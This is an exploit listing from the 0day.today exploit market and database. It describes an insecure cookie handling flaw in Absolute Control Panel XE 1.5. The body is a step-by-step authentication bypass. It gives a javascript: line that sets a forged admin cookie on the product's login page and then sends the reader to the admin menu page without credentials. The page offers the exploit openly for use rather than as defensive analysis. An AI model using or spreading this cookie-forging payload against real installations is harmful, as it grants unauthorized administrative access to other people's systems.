[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Absolute Control Panel XE 1.5 Insecure Cookie Handling Vulnerability

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3976
Category
web applications
Date add
31-10-2008
Platform
asp
====================================================================
Absolute Control Panel XE 1.5 Insecure Cookie Handling Vulnerability
====================================================================


[~] Discovered By : Hakxer
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Control Panel XE [see script] http://www.xigla.com/absolutecp/demo.htm
[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
[~] Team : EgY Coders 
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutecp/xlaabsolutecp/login.asp
Second Execute JS Code 
[~] javascript:document.cookie="xlaCPadmin=lvl=1&email=email@here.com&pwd=admin&usr=admin&userid=1";
Now Go to http://www.xigla.com/absolutecp/xlaabsolutecp/menu.asp

--- Proud To Be A Muslim ---

# _=END=_ #



#  0day.today [2024-11-14]  #